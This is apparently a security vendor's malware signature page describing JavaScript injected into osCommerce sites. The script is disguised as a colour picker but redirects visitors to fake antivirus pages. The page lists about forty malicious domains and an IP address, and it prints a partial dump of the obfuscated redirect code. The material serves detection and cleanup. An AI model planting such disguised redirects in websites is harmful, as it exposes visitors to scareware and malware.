SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwjs1240

malware-entry-mwjs1240

Description: Javascript included and used to distribute malware on osCommerce sites. The code is disguised as color pick, but in fact loads a malicous iframe (for the Fake AV).

Domains used: (all inside the 91.213.157.108):


http://khcol.com/page/?ref=aHR0cDovL2FtZX..kbWluLw==
http://tongho.co.th/engine/
againstvirusxpsoft.com
antiagencyxpsoft.com
antivirixpsoft.com
antivirusxpeasy.com
antivirusxphard.com
antivirusxpinfected.com
antivirusxpsoftcentral.com
antivirusxpsoft.com
antivirusxpsoftonline.com
egyptantivirusxp.com
infectedvirusxpsoft.com
myantivirusxpsoft.com
myxpscanantivirus.com
protestersantivirusxp.com
protestersantivirusxpsoft.com
protesterscanantivirus.com
protesterscanantivirusxp.com
protestersscanantivirus.com
protestersvirusxpsoft.com
scanantivirixp.com
theantivirusxpsoft.com
thexpscanantivirus.com
webantivirusxpsoft.com
webxpscanantivirus.com
xpexamineantivirus.com
xpscanagainstvirus.com
xpscanantiagency.com
xpscanantibacteria.com
xpscanantiviri.com
xpscanantiviruscentral.com
xpscanantivirus.com
xpscanantivirusonline.com
xpscanantivirusprotesters.com
xpscanwarvirus.com
xpseeantivirus.com

Affecting: Any osCommerce site.

Clean up: Contact support: https://support.sucuri.net

Malware dump:


if (typeof(redef_colors)=="undefined") {

var div_colors = new Array("#4b8272', "#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a84', '#82837e', '#40403d', '#727e7c', '#3e7982', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00');

var redef_colors = 1; var colors_picked = 0;

document.location = "http://khcol.com/page/?ref=aHR0cDovL2FtZX..